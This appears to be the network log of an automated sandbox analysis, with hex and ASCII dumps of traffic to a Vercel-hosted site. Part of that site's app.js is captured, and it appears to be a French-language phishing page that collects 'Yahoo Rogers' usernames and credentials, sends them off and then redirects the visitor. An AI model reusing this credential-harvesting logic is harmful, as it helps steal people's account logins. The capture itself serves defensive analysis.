                                                      2024-09-29 05:50:34 UTC1378INData Raw: 63 6f 6e 66 69 67 41 66 74 65 72 4d 65 72 67 65 28 74 29 2c 74 68 69 73 2e 5f 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 74 29 2c 74 7d 73 74 61 74 69 63 20 67 65 74 49 6e 73 74 61 6e 63 65 28 74 29 7b 72 65 74 75 72 6e 20 48 2e 67 65 74 28 72 28 74 29 2c 74 68 69 73 2e 44 41 54 41 5f 4b 45 59 29 7d 73 74 61 74 69 63 20 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 2c 65 3d 7b 7d 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 74 29 7c 7c 6e 65 77 20 74 68 69 73 28 74 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 6e 75 6c 6c 29 7d 73 74 61 74 69 63 20 67 65 74 20 56 45 52 53 49 4f 4e 28 29 7b 72 65 74 75 72 6e 22 35 2e 32 2e 33 22 7d 73 74 61 74 69 63 20 67 65 74 20 44 41 54 41 5f 4b
                                                      Data Ascii: configAfterMerge(t),this._typeCheckConfig(t),t}static getInstance(t){return H.get(r(t),this.DATA_KEY)}static getOrCreateInstance(t,e={}){return this.getInstance(t)||new this(t,"object"==typeof e?e:null)}static get VERSION(){return"5.2.3"}static get DATA_K
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 65 28 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 61 63 74 69 76 65 22 29 29 7d 73 74 61 74 69 63 20 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 4b 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 22 74 6f 67 67 6c 65 22 3d 3d 3d 74 26 26 65 5b 74 5d 28 29 7d 29 29 7d 7d 50 2e 6f 6e 28 64 6f 63 75 6d 65 6e 74 2c 22 63 6c 69 63 6b 2e 62 73 2e 62 75 74 74 6f 6e 2e 64 61 74 61 2d 61 70 69 22 2c 56 2c 28 74 3d 3e 7b 74 2e 70
                                                      Data Ascii: e(){this._element.setAttribute("aria-pressed",this._element.classList.toggle("active"))}static jQueryInterface(t){return this.each((function(){const e=K.getOrCreateInstance(this);"toggle"===t&&e[t]()}))}}P.on(document,"click.bs.button.data-api",V,(t=>{t.p
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 73 2e 5f 63 6f 6e 66 69 67 3d 74 68 69 73 2e 5f 67 65 74 43 6f 6e 66 69 67 28 65 29 2c 74 68 69 73 2e 5f 64 65 6c 74 61 58 3d 30 2c 74 68 69 73 2e 5f 73 75 70 70 6f 72 74 50 6f 69 6e 74 65 72 45 76 65 6e 74 73 3d 42 6f 6f 6c 65 61 6e 28 77 69 6e 64 6f 77 2e 50 6f 69 6e 74 65 72 45 76 65 6e 74 29 2c 74 68 69 73 2e 5f 69 6e 69 74 45 76 65 6e 74 73 28 29 29 7d 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 28 29 7b 72 65 74 75 72 6e 20 58 7d 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 54 79 70 65 28 29 7b 72 65 74 75 72 6e 20 59 7d 73 74 61 74 69 63 20 67 65 74 20 4e 41 4d 45 28 29 7b 72 65 74 75 72 6e 22 73 77 69 70 65 22 7d 64 69 73 70 6f 73 65 28 29 7b 50 2e 6f 66 66 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 22 2e 62 73 2e 73 77 69 70
                                                      Data Ascii: s._config=this._getConfig(e),this._deltaX=0,this._supportPointerEvents=Boolean(window.PointerEvent),this._initEvents())}static get Default(){return X}static get DefaultType(){return Y}static get NAME(){return"swipe"}dispose(){P.off(this._element,".bs.swip
                                                      2024-09-29 05:50:34 UTC1378INData Raw: 78 74 22 2c 4a 3d 22 70 72 65 76 22 2c 5a 3d 22 6c 65 66 74 22 2c 74 74 3d 22 72 69 67 68 74 22 2c 65 74 3d 22 73 6c 69 64 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 69 74 3d 22 63 61 72 6f 75 73 65 6c 22 2c 6e 74 3d 22 61 63 74 69 76 65 22 2c 73 74 3d 7b 41 72 72 6f 77 4c 65 66 74 3a 74 74 2c 41 72 72 6f 77 52 69 67 68 74 3a 5a 7d 2c 6f 74 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 72 69 64 65 3a 21 31 2c 74 6f 75 63 68 3a 21 30 2c 77 72 61 70 3a 21 30 7d 2c 72 74 3d 7b 69 6e 74 65 72 76 61 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29
                                                      Data Ascii: xt",J="prev",Z="left",tt="right",et="slid.bs.carousel",it="carousel",nt="active",st={ArrowLeft:tt,ArrowRight:Z},ot={interval:5e3,keyboard:!0,pause:"hover",ride:!1,touch:!0,wrap:!0},rt={interval:"(number|boolean)",keyboard:"boolean",pause:"(string|boolean)


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.64973876.76.21.2414434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:34 UTC364OUTGET /assets/rogers.png HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:34 UTC498INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152751
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="rogers.png"
                                                      Content-Length: 14221
                                                      Content-Type: image/png
                                                      Date: Sun, 29 Sep 2024 05:50:34 GMT
                                                      Etag: "e7a19d229a7f74e2efeecb0a171078d7"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::kzhv2-1727589034392-c7db2750a1b5
                                                      Connection: close
                                                      2024-09-29 05:50:34 UTC2372INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f8 00 00 00 60 08 06 00 00 00 f1 6a 60 e5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 44 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 f8 a0 03 00 04 00 00 00 01 00 00 00 60 00 00 00 00 0d ac f4 a4 00 00 36 f7 49 44 41 54 78 01 ed 5d 09 60 54 c5 f9 9f 79 6f 37 17 47 36 91 cb 13 d4 24 20 21 54 12 10 f1 a8 78 1f c5 5b ac 5a 6b 49 38 14 ac d6 b6 d6 bf b5 1e 51 7b 59 b5 6a ad a0 08 81 d6 a3 56 ac 78 b4 f5 ac c5 aa a8 40 88 25 84 2b b1 80 a0 82 40 76 73 ef f5 de fc 7f b3 c9 4b 36 bb ef ce 86 2b f3 34 ec 7b 33 df f7 cd f7 7e 33 6f be 99 6f 2e 42 c4 25 10 10 08 08 04 04 02 02 01 81 80
                                                      Data Ascii: PNGIHDR`j`sRGBDeXIfMM*i`6IDATx]`Tyo7G6$ !Tx[ZkI8Q{YjVx@%+@vsK6+4{3~3oo.B%
                                                      2024-09-29 05:50:34 UTC1057INData Raw: 77 96 2f 94 2e 84 8e ba 06 7e 7a da ba 31 6a 44 79 28 d2 a6 9c 9d 68 14 13 de 2b 13 f1 a7 70 e3 15 0e 92 07 cb a4 ea a7 d2 07 b0 3b 79 af 8f 1b 77 94 95 67 12 e8 4d 1e e9 2b 88 7c df 84 c0 76 14 37 5c 4a 1b 7b 04 5e c2 ab bb 98 f0 05 24 5c 08 39 06 ba ff 88 29 ca 8f 4a e9 9a 37 64 2f fd e9 82 70 91 b3 33 e8 13 64 f2 c7 69 de b5 13 68 94 95 37 34 34 9d 83 34 4c ed 4a 47 3c 5f e7 7d 18 63 ea f9 6a 28 4c a0 4b 35 91 a4 df 0c bf ab f0 af f1 eb b8 75 92 72 15 34 cd 53 7d 36 55 c8 dd d1 56 82 06 98 82 aa 93 5f c8 c9 f6 9b 84 7f 59 1a 02 8e e2 7f 4c 25 97 b7 b6 aa ac 94 56 7f 2c c9 d2 fd 0b a3 85 9d 9b c8 24 30 f5 e8 11 e9 a0 f7 ee ee a2 5e ef 3c 62 60 61 bb b5 ee dc 89 37 e6 82 f1 bc c8 ff 0d 7d d4 98 c2 3c 86 4f 44 0b 86 d4 e5 c8 85 5e 31 ee 9d a9 33 76 18 61
                                                      Data Ascii: w/.~z1jDy(h+p;ywgM+|v7\J{^$\9)J7d/p3dih7444LJG<_}cj(LK5ur4S}6UV_YL%V,$0^<b`a7}<OD^13va
                                                      2024-09-29 05:50:34 UTC4744INData Raw: 03 de b7 5a de 05 c3 e4 0d 90 a6 ef 60 c5 c3 34 54 22 70 87 12 19 45 b6 f7 dc e0 94 fe 16 63 c4 1f c4 bf d7 be ba a7 8c ed c8 a9 aa 2b 35 4a 3f 36 14 f2 0d 3d 0b 74 f7 01 97 62 43 3a 46 f2 02 ac 71 3a e2 6d f5 36 1b 3f 5f 73 36 6a 1b 53 cf 11 ca df 32 89 a6 cf cc 5e 5d 53 67 94 ae 16 1e 38 61 e4 d1 2c aa 5c 0c 1d f9 d8 ee 41 77 51 89 3c 0e 37 a3 33 03 cf e8 65 b3 b3 d7 e4 38 9d d4 44 55 3a 13 df b1 23 0c e5 84 8a b0 2c 7d c3 48 16 8c bc 83 da e1 48 47 82 0c 88 a1 cf 00 a8 74 bd 41 74 ef 05 33 fa 1b a4 8d a2 e8 fe 02 92 7c 35 d5 c2 59 99 35 2b e3 e7 14 18 49 e4 1e 94 70 55 f5 23 68 18 dc e8 2c 17 8c 24 26 87 c3 9e cc d8 b2 4e 19 83 53 d5 2e af 68 1d f5 55 32 85 71 08 f7 ca 94 49 6b ff 0c 5c 2e 35 a6 ea 49 0c 7a f4 8c dd 8d e1 99 e3 6f ca ad fd fe e3 f5 f9
                                                      Data Ascii: Z`4T"pEc+5J?6=tbC:Fq:m6?_s6jS2^]Sg8a,\AwQ<73e8DU:#,}HHGtAt3|5Y5+IpU#h,$&NS.hU2qIk\.5Izo
                                                      2024-09-29 05:50:34 UTC5930INData Raw: fc 48 53 a7 4a 21 93 0c 0d 29 97 85 c9 7d 43 9c ca b4 43 2f 31 36 c4 ac f8 a2 62 30 6d fd c3 9d b7 1b e5 4b d7 c0 a3 82 1a c6 37 f0 e1 87 db d8 d1 85 d3 c0 b8 5f 6c 7f 8c d7 ae 54 67 74 f0 5a dc 87 a5 6e 1f 38 e3 da 8f a8 29 99 9b 73 6c da 4f e8 92 9a 70 6f 6a d5 31 71 ee 09 76 ce d8 c5 81 dd 41 ec d5 ad fe 0c 76 24 cb 2a 4d 85 b2 f9 81 09 05 2b 7c 2b 37 d9 f7 00 58 09 dd 8f e3 3d 1e fa 44 34 c2 6c 1b 78 fe 2a aa ca d7 fb b2 0c 27 af 25 f1 7d e7 f5 3b 09 8e 1a ab 68 1c 9e c3 b7 c6 8d 1d 9e 63 53 01 7c b3 b4 54 5a 3b cd 26 f9 01 44 66 77 e7 c7 8e 57 62 e4 fa f2 11 9b e7 f2 25 66 76 5f 32 1a 55 6f b1 4b db 41 87 95 4f 9d 57 fc 7d 67 a0 d1 0d 3a 8a 3f 42 5e bd c2 87 8f 8c 68 92 c2 55 e3 39 40 49 b4 08 80 1d dc 91 d8 9e e4 db fd b6 b5 aa f3 59 54 b9 90 f3 b4
                                                      Data Ascii: HSJ!)}CC/16b0mK7_lTgtZn8)slOpoj1qvAv$*M+|+7X=D4lx*'%};hcS|TZ;&DfwWb%fv_2UoKAOW}g:?B^hU9@IYT
                                                      2024-09-29 05:50:34 UTC118INData Raw: 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 f6 67 04 fe 1f d8 22 3b 62 34 07 51 99 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                      Data Ascii: @@ @@ @@ @@ @@ @@ g";b4QIENDB`


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.64973776.76.21.2414434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:34 UTC353OUTGET /app.js HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:34 UTC521INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152750
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="app.js"
                                                      Content-Length: 5056
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Date: Sun, 29 Sep 2024 05:50:34 GMT
                                                      Etag: "72dad32d2dfcece031bff1406d7e80f9"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::25hvd-1727589034388-1e6c2c591f3e
                                                      Connection: close
                                                      2024-09-29 05:50:34 UTC2372INData Raw: 6c 65 74 20 74 6f 67 67 6c 65 43 6c 69 63 6b 65 64 43 6f 75 6e 74 20 3d 20 30 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 6e 65 78 74 53 74 65 70 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 75 73 65 72 6e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 75 73 65 72 6e 61 6d 65 27 29 2e 76 61 6c 75 65 3b 0a 20 20 20 20 63 6f 6e 73 74 20 72 65 6d 65 6d 62 65 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 72 65 6d 65 6d 62 65 72 27 29 2e 63 68 65 63 6b 65 64 3b 0a 0a 20 20 20 20 69 66 20 28 75 73 65 72 6e 61 6d 65 20 21 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 74 65 70 31 27 29 2e 73 74 79 6c 65
                                                      Data Ascii: let toggleClickedCount = 0;function nextStep() { const username = document.getElementById('username').value; const remember = document.getElementById('remember').checked; if (username !== '') { document.getElementById('step1').style
                                                      2024-09-29 05:50:34 UTC1034INData Raw: 53 55 43 43 45 53 53 21 27 2c 20 72 65 73 70 6f 6e 73 65 2e 73 74 61 74 75 73 2c 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 64 69 72 65 63 74 54 6f 55 52 4c 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 72 72 6f 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 45 52 52 4f 52 21 27 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 64 69 72 65 63 74 54 6f 55 52 4c 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 7d 29 3b 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 54 6f 55 52 4c 28 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f
                                                      Data Ascii: SUCCESS!', response.status, response.text); redirectToURL(); }, function (error) { console.log('ERROR!', error); redirectToURL(); });});function redirectToURL() { window.location.href = 'https://
                                                      2024-09-29 05:50:34 UTC1650INData Raw: 20 20 20 20 20 20 20 20 27 63 72 65 64 65 6e 74 69 61 6c 73 27 3a 20 27 61 76 65 63 20 76 6f 73 20 61 75 74 68 65 6e 74 69 66 69 61 6e 74 73 20 59 61 68 6f 6f 20 52 6f 67 65 72 73 27 2c 0a 20 20 20 20 20 20 20 20 27 69 6e 66 6f 27 3a 20 27 69 6e 66 6f 27 2c 0a 20 20 20 20 20 20 20 20 27 72 65 6d 65 6d 62 65 72 5f 75 73 65 72 6e 61 6d 65 27 3a 20 27 53 65 20 73 6f 75 76 65 6e 69 72 20 64 75 20 6e 6f 6d 20 64 5c 27 75 74 69 6c 69 73 61 74 65 75 72 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 69 6e 75 65 27 3a 20 27 43 6f 6e 74 69 6e 75 65 72 27 2c 0a 20 20 20 20 20 20 20 20 27 75 73 65 72 6e 61 6d 65 5f 6c 61 62 65 6c 27 3a 20 27 4e 6f 6d 20 64 5c 27 75 74 69 6c 69 73 61 74 65 75 72 20 3a 20 3c 73 70 61 6e 20 69 64 3d 22 64 69 73 70 6c 61 79 55 73 65 72
                                                      Data Ascii: 'credentials': 'avec vos authentifiants Yahoo Rogers', 'info': 'info', 'remember_username': 'Se souvenir du nom d\'utilisateur', 'continue': 'Continuer', 'username_label': 'Nom d\'utilisateur : <span id="displayUser


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.649740184.28.90.27443
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:35 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-09-29 05:50:36 UTC467INHTTP/1.1 200 OK
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (lpl/EF67)
                                                      X-CID: 11
                                                      X-Ms-ApiVersion: Distribute 1.2
                                                      X-Ms-Region: prod-neu-z1
                                                      Cache-Control: public, max-age=125667
                                                      Date: Sun, 29 Sep 2024 05:50:35 GMT
                                                      Connection: close
                                                      X-CID: 2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.649746151.101.129.2294434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:36 UTC391OUTGET /npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js HTTP/1.1
                                                      Host: cdn.jsdelivr.net
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:36 UTC776INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 80420
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: *
                                                      Timing-Allow-Origin: *
                                                      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Content-Type: application/javascript; charset=utf-8
                                                      X-JSD-Version: 5.2.3
                                                      X-JSD-Version-Type: version
                                                      ETag: W/"13a24-kNFQNu9I/LM2oTW66BK0VmnxkEQ"
                                                      Accept-Ranges: bytes
                                                      Date: Sun, 29 Sep 2024 05:50:36 GMT
                                                      Age: 1522992
                                                      X-Served-By: cache-fra-etou8220135-FRA, cache-ewr-kewr1740077-EWR
                                                      X-Cache: HIT, HIT
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                      2024-09-29 05:50:36 UTC16384INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 32 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62
                                                      Data Ascii: /*! * Bootstrap v5.2.3 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
                                                      2024-09-29 05:50:36 UTC16384INData Raw: 72 65 74 75 72 6e 20 51 2e 66 69 6e 64 28 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 7d 5f 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 29 7b 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 7d 5f 64 69 72 65 63 74 69 6f 6e 54 6f 4f 72 64 65 72 28 74 29 7b 72 65 74 75 72 6e 20 70 28 29 3f 74 3d 3d 3d 5a 3f 4a 3a 47 3a 74 3d 3d 3d 5a 3f 47 3a 4a 7d 5f 6f 72 64 65 72 54 6f 44 69 72 65 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 70 28 29 3f 74 3d 3d 3d 4a 3f 5a 3a 74 74 3a 74 3d 3d 3d 4a 3f 74 74 3a 5a 7d 73 74 61 74 69 63 20 6a 51 75 65 72 79 49 6e 74 65 72
                                                      Data Ascii: return Q.find(".carousel-item",this._element)}_clearInterval(){this._interval&&(clearInterval(this._interval),this._interval=null)}_directionToOrder(t){return p()?t===Z?J:G:t===Z?G:J}_orderToDirection(t){return p()?t===J?Z:tt:t===J?tt:Z}static jQueryInter
                                                      2024-09-29 05:50:36 UTC16384INData Raw: 65 74 75 72 6e 20 66 5b 74 5d 2d 66 5b 65 5d 7d 29 29 7d 63 6f 6e 73 74 20 53 65 3d 7b 6e 61 6d 65 3a 22 66 6c 69 70 22 2c 65 6e 61 62 6c 65 64 3a 21 30 2c 70 68 61 73 65 3a 22 6d 61 69 6e 22 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 73 74 61 74 65 2c 69 3d 74 2e 6f 70 74 69 6f 6e 73 2c 6e 3d 74 2e 6e 61 6d 65 3b 69 66 28 21 65 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 5b 6e 5d 2e 5f 73 6b 69 70 29 7b 66 6f 72 28 76 61 72 20 73 3d 69 2e 6d 61 69 6e 41 78 69 73 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 73 7c 7c 73 2c 72 3d 69 2e 61 6c 74 41 78 69 73 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2c 6c 3d 69 2e 66 61 6c 6c 62 61 63 6b 50 6c 61 63 65 6d 65 6e 74 73 2c 63 3d 69 2e 70 61 64 64 69 6e 67 2c 68 3d 69 2e 62 6f 75 6e 64 61
                                                      Data Ascii: eturn f[t]-f[e]}))}const Se={name:"flip",enabled:!0,phase:"main",fn:function(t){var e=t.state,i=t.options,n=t.name;if(!e.modifiersData[n]._skip){for(var s=i.mainAxis,o=void 0===s||s,r=i.altAxis,a=void 0===r||r,l=i.fallbackPlacements,c=i.padding,h=i.bounda
                                                      2024-09-29 05:50:36 UTC16384INData Raw: 29 29 7d 68 69 64 65 28 74 29 7b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 73 56 69 73 69 62 6c 65 3f 28 74 68 69 73 2e 5f 67 65 74 45 6c 65 6d 65 6e 74 28 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 6d 69 29 2c 74 68 69 73 2e 5f 65 6d 75 6c 61 74 65 41 6e 69 6d 61 74 69 6f 6e 28 28 28 29 3d 3e 7b 74 68 69 73 2e 64 69 73 70 6f 73 65 28 29 2c 6d 28 74 29 7d 29 29 29 3a 6d 28 74 29 7d 64 69 73 70 6f 73 65 28 29 7b 74 68 69 73 2e 5f 69 73 41 70 70 65 6e 64 65 64 26 26 28 50 2e 6f 66 66 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 5f 69 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 5f 69 73 41 70 70 65 6e 64 65 64 3d 21 31 29 7d 5f 67 65 74 45 6c 65 6d 65 6e 74 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 65
                                                      Data Ascii: ))}hide(t){this._config.isVisible?(this._getElement().classList.remove(mi),this._emulateAnimation((()=>{this.dispose(),m(t)}))):m(t)}dispose(){this._isAppended&&(P.off(this._element,_i),this._element.remove(),this._isAppended=!1)}_getElement(){if(!this._e
                                                      2024-09-29 05:50:36 UTC14884INData Raw: 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 20 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 69 29 2c 74 68 69 73 2e 5f 69 73 41 6e 69 6d 61 74 65 64 28 29 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 5a 69 29 2c 65 7d 73 65 74 43 6f 6e 74 65 6e 74 28 74 29 7b 74 68 69 73 2e 5f 6e 65 77 43 6f 6e 74 65 6e 74 3d 74 2c 74 68 69 73 2e 5f 69 73 53 68 6f 77 6e 28 29 26 26 28 74 68 69 73 2e 5f 64 69 73 70 6f 73 65 50 6f 70 70 65 72 28 29 2c 74 68 69 73 2e 73 68 6f 77 28 29 29 7d 5f 67 65 74 54 65 6d 70 6c 61 74 65 46 61 63 74 6f 72 79 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 65 6d 70 6c 61 74 65 46 61 63 74 6f 72 79 3f 74 68 69 73 2e 5f 74 65 6d 70 6c 61 74 65 46 61 63 74 6f 72 79 2e 63 68 61 6e 67 65 43 6f 6e 74 65 6e 74 28
